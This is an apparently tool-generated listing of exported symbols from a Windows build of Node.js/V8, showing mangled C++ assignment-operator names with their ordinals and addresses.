                                  ??4?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z14320x140076a30
                                  ??4?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14330x140076a30
                                  ??4?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z14340x140076a30
                                  ??4?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14350x140076a30
                                  ??4?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z14360x140076a30
                                  ??4?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14370x140076a30
                                  ??4?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z14380x140076a30
                                  ??4?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14390x140076a30
                                  ??4?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z14400x140076a30
                                  ??4?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14410x140076a30
                                  ??4?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z14420x140076a30
                                  ??4?$HashTable@VStringTable@internal@v8@@VStringTableShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14430x140076a30
                                  ??4?$HashTable@VStringTable@internal@v8@@VStringTableShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z14440x140076a30
                                  ??4?$MagicNumbersForDivision@I@base@v8@@QEAAAEAU012@$$QEAU012@@Z14450x140420520
                                  ??4?$MagicNumbersForDivision@I@base@v8@@QEAAAEAU012@AEBU012@@Z14460x140420540
                                  ??4?$MagicNumbersForDivision@_K@base@v8@@QEAAAEAU012@$$QEAU012@@Z14470x1410473e0
                                  ??4?$MagicNumbersForDivision@_K@base@v8@@QEAAAEAU012@AEBU012@@Z14480x140077a00
                                  ??4?$MemoryController@UGlobalMemoryTrait@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14490x1400769f0
                                  ??4?$MemoryController@UGlobalMemoryTrait@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z14500x1400769f0
                                  ??4?$MemoryController@UV8HeapTrait@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14510x1400769f0
                                  ??4?$MemoryController@UV8HeapTrait@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z14520x1400769f0
                                  ??4?$MemorySpan@$$CBD@v8@@QEAAAEAV01@$$QEAV01@@Z14530x140453040
                                  ??4?$MemorySpan@$$CBD@v8@@QEAAAEAV01@AEBV01@@Z14540x140077a00
                                  ??4?$MemorySpan@$$CBE@v8@@QEAAAEAV01@$$QEAV01@@Z14550x140453040
                                  ??4?$MemorySpan@$$CBE@v8@@QEAAAEAV01@AEBV01@@Z14560x140077a00
                                  ??4?$ObjectHashTableBase@VEphemeronHashTable@internal@v8@@VEphemeronHashTableShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14570x140076a30
                                  ??4?$ObjectHashTableBase@VEphemeronHashTable@internal@v8@@VEphemeronHashTableShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z14580x140076a30
                                  ??4?$ObjectHashTableBase@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14590x140076a30
                                  ??4?$ObjectHashTableBase@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z14600x140076a30
                                  ??4?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14610x140076a30
                                  ??4?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@QEAAAEAV012@AEBV012@@Z14620x140076a30
                                  ??4?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14630x140076a30
                                  ??4?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@QEAAAEAV012@AEBV012@@Z14640x140076a30
                                  ??4?$OrderedHashTableHandler@VSmallOrderedHashMap@internal@v8@@VOrderedHashMap@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14650x1400769f0
                                  ??4?$OrderedHashTableHandler@VSmallOrderedHashMap@internal@v8@@VOrderedHashMap@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z14660x1400769f0
                                  ??4?$OrderedHashTableHandler@VSmallOrderedHashSet@internal@v8@@VOrderedHashSet@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14670x1400769f0
                                  ??4?$OrderedHashTableHandler@VSmallOrderedHashSet@internal@v8@@VOrderedHashSet@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z14680x1400769f0
                                  ??4?$OrderedHashTableHandler@VSmallOrderedNameDictionary@internal@v8@@VOrderedNameDictionary@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14690x1400769f0
                                  ??4?$OrderedHashTableHandler@VSmallOrderedNameDictionary@internal@v8@@VOrderedNameDictionary@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z14700x1400769f0
                                  ??4?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEAAAEAV0123@$$QEAV0123@@Z14710x140076a30
                                  ??4?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEAAAEAV0123@AEBV0123@@Z14720x140076a30
                                  ??4?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEAAAEAVThreadTicks@23@V423@@Z14730x140076a70
                                  ??4?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEAAAEAV0123@$$QEAV0123@@Z14740x140076a30
                                  ??4?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEAAAEAV0123@AEBV0123@@Z14750x140076a30
                                  ??4?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEAAAEAVTime@23@V423@@Z14760x140076a70
                                  ??4?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEAAAEAV0123@$$QEAV0123@@Z14770x140076a30
                                  ??4?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEAAAEAV0123@AEBV0123@@Z14780x140076a30
                                  ??4?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEAAAEAVTimeTicks@23@V423@@Z14790x140076a70
                                  ??4?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z14800x140452fb0
                                  ??4?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z14810x140452fd0
                                  ??4?$basic_ostream@DU?$char_traits@D@std@@@std@@IEAAAEAV01@$$QEAV01@@Z14820x140457ea0
                                  ??4?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAAEAV01@AEBV01@@Z14830x140457ee0
                                  ??4?$enable_shared_from_this@VCounters@V8Inspector@v8_inspector@@@std@@IEAAAEAV01@AEBV01@@Z14840x1400769f0
                                  ??4?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAAAEAV01@$$QEAV01@@Z14850x140452fb0
                                  ??4?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAAAEAV01@AEBV01@@Z14860x140452fd0
                                  ??4?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAAAEAV01@V?$initializer_list@PEAVMoveOperands@compiler@internal@v8@@@1@@Z14870x140452ff0
                                  ??4?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAAAEAV01@$$QEAV01@@Z14880x14007a050
                                  ??4?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAAAEAV01@AEBV01@@Z14890x140079a50
                                  ??4?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAAAEAV01@V?$initializer_list@UCpuProfileDeoptFrame@v8@@@1@@Z14900x1400799d0
                                  ??4?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAAAEAV01@$$QEAV01@@Z14910x140078fc0
                                  ??4?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAAAEAV01@AEBV01@@Z14920x140078840
                                  ??4?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAAAEAV01@V?$initializer_list@UCpuProfileDeoptInfo@v8@@@1@@Z14930x140078810
                                  ??4AbstractBytecodeArray@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z14940x1400769f0
                                  ??4AccessorPair@debug@v8@@QEAAAEAV012@$$QEAV012@@Z14950x1400769f0
                                  ??4AccessorPair@debug@v8@@QEAAAEAV012@AEBV012@@Z14960x1400769f0
                                  ??4AccessorSignature@v8@@QEAAAEAV01@$$QEAV01@@Z14970x1400769f0
                                  ??4AccessorSignature@v8@@QEAAAEAV01@AEBV01@@Z14980x1400769f0
                                  ??4ActivityControl@v8@@QEAAAEAV01@AEBV01@@Z14990x1400769f0
                                  ??4AddressToTraceMap@internal@v8@@QEAAAEAV012@$$QEAV012@@Z15000x1406da2c0
                                  ??4AddressToTraceMap@internal@v8@@QEAAAEAV012@AEBV012@@Z15010x1406da310
                                  ??4AllocationProfile@v8@@QEAAAEAV01@AEBV01@@Z15020x1400769f0
                                  ??4Allocator@ArrayBuffer@v8@@QEAAAEAV012@AEBV012@@Z15030x1400769f0
                                  ??4Array@v8@@QEAAAEAV01@$$QEAV01@@Z15040x1400769f0
                                  ??4Array@v8@@QEAAAEAV01@AEBV01@@Z15050x1400769f0
                                  ??4ArrayBuffer@v8@@QEAAAEAV01@$$QEAV01@@Z15060x1400769f0
                                  ??4ArrayBuffer@v8@@QEAAAEAV01@AEBV01@@Z15070x1400769f0
                                  ??4ArrayBufferAllocator@node@@QEAAAEAV01@$$QEAV01@@Z15080x1400769f0
                                  ??4ArrayBufferAllocator@node@@QEAAAEAV01@AEBV01@@Z15090x1400769f0
                                  ??4ArrayBufferView@v8@@QEAAAEAV01@$$QEAV01@@Z15100x1400769f0
                                  ??4ArrayBufferView@v8@@QEAAAEAV01@AEBV01@@Z15110x1400769f0
                                  ??4AsmJsScanner@internal@v8@@QEAAAEAV012@$$QEAV012@@Z15120x140a666b0
                                  ??4AsmJsScanner@internal@v8@@QEAAAEAV012@AEBV012@@Z15130x140a66810
                                  ??4AsmType@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z15140x1400769f0
                                  ??4AsmType@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z15150x1400769f0
                                  ??4AssemblerOptions@internal@v8@@QEAAAEAU012@$$QEAU012@@Z15160x140435f60
                                  ??4AssemblerOptions@internal@v8@@QEAAAEAU012@AEBU012@@Z15170x140077790
                                  ??4AstRawStringComparer@SourceTextModuleDescriptor@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z15180x1400769f0
                                  ??4AstRawStringComparer@SourceTextModuleDescriptor@internal@v8@@QEAAAEAU0123@AEBU0123@@Z15190x1400769f0
                                  ??4AtomicsWaitWakeHandle@Isolate@v8@@QEAAAEAV012@$$QEAV012@@Z15200x1400769f0
                                  ??4AtomicsWaitWakeHandle@Isolate@v8@@QEAAAEAV012@AEBV012@@Z15210x1400769f0
                                  ??4BackingStore@v8@@QEAAAEAV01@AEBV01@@Z15220x1400769f0
                                  ??4BackupIncumbentScope@Context@v8@@QEAAAEAV012@AEBV012@@Z15230x140077790
                                  ??4BigInt64Array@v8@@QEAAAEAV01@$$QEAV01@@Z15240x1400769f0
                                  ??4BigInt64Array@v8@@QEAAAEAV01@AEBV01@@Z15250x1400769f0
                                  ??4BigInt@v8@@QEAAAEAV01@$$QEAV01@@Z15260x1400769f0
                                  ??4BigInt@v8@@QEAAAEAV01@AEBV01@@Z15270x1400769f0
                                  ??4BigIntObject@v8@@QEAAAEAV01@$$QEAV01@@Z15280x1400769f0
                                  ??4BigIntObject@v8@@QEAAAEAV01@AEBV01@@Z15290x1400769f0
                                  ??4BigIntToI32PairDescriptor@internal@v8@@QEAAAEAV012@$$QEAV012@@Z15300x140077990
                                  ??4BigIntToI32PairDescriptor@internal@v8@@QEAAAEAV012@AEBV012@@Z15310x140077990
                                  ??4BigIntToI64Descriptor@internal@v8@@QEAAAEAV012@$$QEAV012@@Z15320x140077990
                                  ??4BigIntToI64Descriptor@internal@v8@@QEAAAEAV012@AEBV012@@Z15330x140077990
                                  ??4BigUint64Array@v8@@QEAAAEAV01@$$QEAV01@@Z15340x1400769f0
                                  ??4BigUint64Array@v8@@QEAAAEAV01@AEBV01@@Z15350x1400769f0
                                  ??4Binary@protocol@v8_inspector@@QEAAAEAV012@$$QEAV012@@Z15360x14009e770
                                  ??4Binary@protocol@v8_inspector@@QEAAAEAV012@AEBV012@@Z15370x1403e7f50
                                  ??4Bitmap@internal@v8@@QEAAAEAV012@$$QEAV012@@Z15380x1400769f0
                                  ??4Bitmap@internal@v8@@QEAAAEAV012@AEBV012@@Z15390x1400769f0
                                  ??4BitsetType@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z15400x1400769f0
                                  ??4BitsetType@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z15410x1400769f0
                                  ??4BlockData@Coverage@debug@v8@@QEAAAEAV0123@$$QEAV0123@@Z15420x14041fd00
                                  ??4Boolean@v8@@QEAAAEAV01@$$QEAV01@@Z15430x1400769f0
                                  ??4Boolean@v8@@QEAAAEAV01@AEBV01@@Z15440x1400769f0
                                  ??4BooleanObject@v8@@QEAAAEAV01@$$QEAV01@@Z15450x1400769f0
                                  ??4BooleanObject@v8@@QEAAAEAV01@AEBV01@@Z15460x1400769f0
                                  ??4BranchMatcher@compiler@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z15470x1400777b0
                                  ??4BranchMatcher@compiler@internal@v8@@QEAAAEAU0123@AEBU0123@@Z15480x140077790
                                  ??4BreakLocation@debug@v8@@QEAAAEAV012@$$QEAV012@@Z15490x14041fd30
                                  ??4BreakLocation@debug@v8@@QEAAAEAV012@AEBV012@@Z15500x140077a00
                                  ??4ByteData@PreparseDataBuilder@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z15510x14041fd50
                                  ??4ByteData@PreparseDataBuilder@internal@v8@@QEAAAEAV0123@AEBV0123@@Z15520x1400778e0
                                  ??4BytecodeDecoder@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z15530x1400769f0
                                  ??4BytecodeDecoder@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z15540x1400769f0
                                  ??4BytecodeIterator@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z15550x140519ac0
                                  ??4BytecodeIterator@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z15560x140519ac0
                                  ??4BytecodeJumpTable@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z15570x140420070
                                  ??4BytecodeJumpTable@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z15580x140077790
                                  ??4BytecodeLabel@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z15590x140869fe0
                                  ??4BytecodeLabel@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z15600x140077a00
                                  ??4BytecodeLoopHeader@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z15610x140076a30
                                  ??4BytecodeLoopHeader@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z15620x140076a30
                                  ??4BytecodeNode@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z15630x140872710
                                  ??4BytecodeNode@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z15640x140077890
                                  ??4Bytecodes@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z15650x1400769f0
                                  ??4Bytecodes@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z15660x1400769f0
                                  ??4CFunction@v8@@QEAAAEAV01@$$QEAV01@@Z15670x140453040
                                  ??4CFunction@v8@@QEAAAEAV01@AEBV01@@Z15680x140077a00
                                  ??4CPU@base@v8@@QEAAAEAV012@$$QEAV012@@Z15690x140dc2b60
                                  ??4CPU@base@v8@@QEAAAEAV012@AEBV012@@Z15700x140dc2c90
                                  ??4CallDescriptors@internal@v8@@QEAAAEAV012@$$QEAV012@@Z15710x1400769f0
                                  ??4CallDescriptors@internal@v8@@QEAAAEAV012@AEBV012@@Z15720x1400769f0
                                  ??4CallInterfaceDescriptor@internal@v8@@QEAAAEAV012@AEBV012@@Z15730x140077990
                                  ??4CanonicalHandleScope@internal@v8@@QEAAAEAV012@AEBV012@@Z15740x14041fd80
                                  ??4Channel@V8Inspector@v8_inspector@@QEAAAEAV012@AEBV012@@Z15750x1400769f0
                                  ??4CodeCommentsIterator@internal@v8@@QEAAAEAV012@$$QEAV012@@Z15760x140435fb0
                                  ??4CodeCommentsIterator@internal@v8@@QEAAAEAV012@AEBV012@@Z15770x140077790
                                  ??4CodeEvent@v8@@QEAAAEAV01@$$QEAV01@@Z15780x1400769f0
                                  ??4CodeEvent@v8@@QEAAAEAV01@AEBV01@@Z15790x1400769f0
                                  ??4CodeFactory@internal@v8@@QEAAAEAV012@$$QEAV012@@Z15800x1400769f0
                                  ??4CodeFactory@internal@v8@@QEAAAEAV012@AEBV012@@Z15810x1400769f0
                                  ??4CodeObjectRegistry@internal@v8@@QEAAAEAV012@$$QEAV012@@Z15820x14041fdc0
                                  ??4CodeObjectRegistry@internal@v8@@QEAAAEAV012@AEBV012@@Z15830x14041fe20
                                  ??4CompilationJob@internal@v8@@QEAAAEAV012@AEBV012@@Z15840x1405ae500
                                  ??4CompilationResultResolver@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z15850x1400769f0
                                  ??4Compiler@internal@v8@@QEAAAEAV012@$$QEAV012@@Z15860x1400769f0
                                  ??4Compiler@internal@v8@@QEAAAEAV012@AEBV012@@Z15870x1400769f0
                                  ??4Constant@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z15880x140453020
                                  ??4Constant@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z15890x140077a00
                                  ??4Contents@ArrayBuffer@v8@@QEAAAEAV012@$$QEAV012@@Z15900x1400775f0
                                  ??4Contents@ArrayBuffer@v8@@QEAAAEAV012@AEBV012@@Z15910x1400775c0
                                  ??4Contents@SharedArrayBuffer@v8@@QEAAAEAV012@$$QEAV012@@Z15920x1400775f0
                                  ??4Contents@SharedArrayBuffer@v8@@QEAAAEAV012@AEBV012@@Z15930x1400775c0
                                  ??4Context@v8@@QEAAAEAV01@$$QEAV01@@Z15940x1400769f0
                                  ??4Context@v8@@QEAAAEAV01@AEBV01@@Z15950x1400769f0
                                  ??4Counters@V8Inspector@v8_inspector@@QEAAAEAV012@AEBV012@@Z15960x14041fe80
                                  ??4Coverage@debug@v8@@QEAAAEAV012@$$QEAV012@@Z15970x14041fee0
                                  ??4CpuFeatureScope@internal@v8@@QEAAAEAV012@AEBV012@@Z15980x1400769f0
                                  ??4CpuProfile@v8@@QEAAAEAV01@$$QEAV01@@Z15990x1400769f0
                                  ??4CpuProfile@v8@@QEAAAEAV01@AEBV01@@Z16000x1400769f0
                                  ??4CpuProfileDeoptInfo@v8@@QEAAAEAU01@$$QEAU01@@Z16010x140077c20
                                  ??4CpuProfileDeoptInfo@v8@@QEAAAEAU01@AEBU01@@Z16020x140077b80
                                  ??4CpuProfileNode@v8@@QEAAAEAV01@$$QEAV01@@Z16030x1400769f0
                                  ??4CpuProfileNode@v8@@QEAAAEAV01@AEBV01@@Z16040x1400769f0
                                  ??4CpuProfilingOptions@v8@@QEAAAEAV01@$$QEAV01@@Z16050x140077cd0
                                  ??4CpuProfilingOptions@v8@@QEAAAEAV01@AEBV01@@Z16060x140077cd0
                                  ??4Data@v8@@QEAAAEAV01@$$QEAV01@@Z16070x1400769f0
                                  ??4Data@v8@@QEAAAEAV01@AEBV01@@Z16080x1400769f0
                                  ??4DataView@v8@@QEAAAEAV01@$$QEAV01@@Z16090x1400769f0
                                  ??4DataView@v8@@QEAAAEAV01@AEBV01@@Z16100x1400769f0
                                  ??4Date@v8@@QEAAAEAV01@$$QEAV01@@Z16110x1400769f0
                                  ??4Date@v8@@QEAAAEAV01@AEBV01@@Z16120x1400769f0
                                  ??4DateCache@internal@v8@@QEAAAEAV012@AEBV012@@Z16130x140676310
                                  ??4DbgStreamBuf@internal@v8@@QEAAAEAV012@AEBV012@@Z16140x140458030
                                  ??4DeferredHandleScope@internal@v8@@QEAAAEAV012@AEBV012@@Z16150x140077790
                                  ??4DeferredHandles@internal@v8@@QEAAAEAV012@AEBV012@@Z16160x14041ff00
                                  ??4Delegate@ValueDeserializer@v8@@QEAAAEAV012@AEBV012@@Z16170x1400769f0
                                  ??4Delegate@ValueSerializer@v8@@QEAAAEAV012@AEBV012@@Z16180x1400769f0
                                  ??4DeleteACHHandle@node@@QEAAAEAU01@$$QEAU01@@Z16190x1400769f0
                                  ??4DeleteACHHandle@node@@QEAAAEAU01@AEBU01@@Z16200x1400769f0
                                  ??4Descriptor@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16210x14041ffb0
                                  ??4Descriptor@internal@v8@@QEAAAEAV012@AEBV012@@Z16220x1400778e0
                                  ??4DetachableVectorBase@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16230x1400777b0
                                  ??4DetachableVectorBase@internal@v8@@QEAAAEAV012@AEBV012@@Z16240x140077790
                                  ??4DiamondMatcher@compiler@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z16250x140077900
                                  ??4DiamondMatcher@compiler@internal@v8@@QEAAAEAU0123@AEBU0123@@Z16260x1400778e0
                                  ??4DisjointAllocationPool@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z16270x14041ffd0
                                  ??4Domain@API@Schema@protocol@v8_inspector@@QEAAAEAV01234@$$QEAV01234@@Z16280x1400769f0
                                  ??4Domain@API@Schema@protocol@v8_inspector@@QEAAAEAV01234@AEBV01234@@Z16290x1400769f0
                                  ??4EhFrameConstants@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16300x1400769f0
                                  ??4EhFrameConstants@internal@v8@@QEAAAEAV012@AEBV012@@Z16310x1400769f0
                                  ??4EhFrameIterator@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16320x1400777b0
                                  ??4EhFrameIterator@internal@v8@@QEAAAEAV012@AEBV012@@Z16330x140077790
                                  ??4EmbedderGraph@v8@@QEAAAEAV01@AEBV01@@Z16340x1400769f0
                                  ??4EmbedderHeapTracer@v8@@QEAAAEAV01@AEBV01@@Z16350x140077990
                                  ??4Entry@TypeProfile@debug@v8@@QEAAAEAV0123@$$QEAV0123@@Z16360x14041fd00
                                  ??4EphemeronHashTable@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16370x140076a30
                                  ??4EphemeronHashTable@internal@v8@@QEAAAEAV012@AEBV012@@Z16380x140076a30
                                  ??4Exception@v8@@QEAAAEAV01@$$QEAV01@@Z16390x1400769f0
                                  ??4Exception@v8@@QEAAAEAV01@AEBV01@@Z16400x1400769f0
                                  ??4Exported@protocol@v8_inspector@@QEAAAEAV012@AEBV012@@Z16410x1400769f0
                                  ??4External@v8@@QEAAAEAV01@$$QEAV01@@Z16420x1400769f0
                                  ??4External@v8@@QEAAAEAV01@AEBV01@@Z16430x1400769f0
                                  ??4ExternalResourceVisitor@v8@@QEAAAEAV01@AEBV01@@Z16440x1400769f0
                                  ??4ExternalSourceStream@ScriptCompiler@v8@@QEAAAEAV012@AEBV012@@Z16450x1400769f0
                                  ??4Factory@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16460x1400769f0
                                  ??4Factory@internal@v8@@QEAAAEAV012@AEBV012@@Z16470x1400769f0
                                  ??4FeedbackNexus@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16480x140420070
                                  ??4FeedbackNexus@internal@v8@@QEAAAEAV012@AEBV012@@Z16490x140077790
                                  ??4FeedbackVectorSpec@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16500x140420090
                                  ??4FeedbackVectorSpec@internal@v8@@QEAAAEAV012@AEBV012@@Z16510x1404201c0
                                  ??4FinalizationGroup@v8@@QEAAAEAV01@$$QEAV01@@Z16520x1400769f0
                                  ??4FinalizationGroup@v8@@QEAAAEAV01@AEBV01@@Z16530x1400769f0
                                  ??4FlagList@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16540x1400769f0
                                  ??4FlagList@internal@v8@@QEAAAEAV012@AEBV012@@Z16550x1400769f0
                                  ??4FlatStringReader@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16560x1404202b0
                                  ??4FlatStringReader@internal@v8@@QEAAAEAV012@AEBV012@@Z16570x1404202b0
                                  ??4Float32Array@v8@@QEAAAEAV01@$$QEAV01@@Z16580x1400769f0
                                  ??4Float32Array@v8@@QEAAAEAV01@AEBV01@@Z16590x1400769f0
                                  ??4Float64Array@v8@@QEAAAEAV01@$$QEAV01@@Z16600x1400769f0
                                  ??4Float64Array@v8@@QEAAAEAV01@AEBV01@@Z16610x1400769f0
                                  ??4Function@v8@@QEAAAEAV01@$$QEAV01@@Z16620x1400769f0
                                  ??4Function@v8@@QEAAAEAV01@AEBV01@@Z16630x1400769f0
                                  ??4FunctionData@Coverage@debug@v8@@QEAAAEAV0123@$$QEAV0123@@Z16640x14041fd00
                                  ??4FunctionTemplate@v8@@QEAAAEAV01@$$QEAV01@@Z16650x1400769f0
                                  ??4FunctionTemplate@v8@@QEAAAEAV01@AEBV01@@Z16660x1400769f0
                                  ??4GCEntryCreateTrait@CodeEntry@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z16670x1400769f0
                                  ??4GCEntryCreateTrait@CodeEntry@internal@v8@@QEAAAEAU0123@AEBU0123@@Z16680x1400769f0
                                  ??4GlobalDictionary@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16690x140076a30
                                  ??4GlobalDictionary@internal@v8@@QEAAAEAV012@AEBV012@@Z16700x140076a30
                                  ??4GlobalDictionaryShape@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16710x1400769f0
                                  ??4GlobalDictionaryShape@internal@v8@@QEAAAEAV012@AEBV012@@Z16720x1400769f0
                                  ??4HandlerTable@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16730x1404202f0
                                  ??4HandlerTable@internal@v8@@QEAAAEAV012@AEBV012@@Z16740x140077a00
                                  ??4HashTableBase@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16750x140076a30
                                  ??4HashTableBase@internal@v8@@QEAAAEAV012@AEBV012@@Z16760x140076a30
                                  ??4HeapCodeStatistics@v8@@QEAAAEAV01@$$QEAV01@@Z16770x1400777b0
                                  ??4HeapCodeStatistics@v8@@QEAAAEAV01@AEBV01@@Z16780x140077790
                                  ??4HeapConstantType@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z16790x140458080
                                  ??4HeapConstantType@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z16800x140077790
                                  ??4HeapGraphEdge@v8@@QEAAAEAV01@$$QEAV01@@Z16810x1400769f0
                                  ??4HeapGraphEdge@v8@@QEAAAEAV01@AEBV01@@Z16820x1400769f0
                                  ??4HeapGraphNode@v8@@QEAAAEAV01@$$QEAV01@@Z16830x1400769f0
                                  ??4HeapGraphNode@v8@@QEAAAEAV01@AEBV01@@Z16840x1400769f0
                                  ??4HeapObjectStatistics@v8@@QEAAAEAV01@$$QEAV01@@Z16850x140077900
                                  ??4HeapObjectStatistics@v8@@QEAAAEAV01@AEBV01@@Z16860x1400778e0
                                  ??4HeapSnapshot@v8@@QEAAAEAV01@$$QEAV01@@Z16870x1400769f0
                                  ??4HeapSnapshot@v8@@QEAAAEAV01@AEBV01@@Z16880x1400769f0
                                  ??4HeapSpaceStatistics@v8@@QEAAAEAV01@$$QEAV01@@Z16890x1400778b0
                                  ??4HeapSpaceStatistics@v8@@QEAAAEAV01@AEBV01@@Z16900x140077890
                                  ??4HeapStatistics@v8@@QEAAAEAV01@$$QEAV01@@Z16910x140077810
                                  ??4HeapStatistics@v8@@QEAAAEAV01@AEBV01@@Z16920x1400777d0
                                  ??4HiddenFactory@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16930x1400769f0
                                  ??4HiddenFactory@internal@v8@@QEAAAEAV012@AEBV012@@Z16940x1400769f0
                                  ??4HiddenOffThreadFactory@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16950x140076a30
                                  ??4HiddenOffThreadFactory@internal@v8@@QEAAAEAV012@AEBV012@@Z16960x140076a30
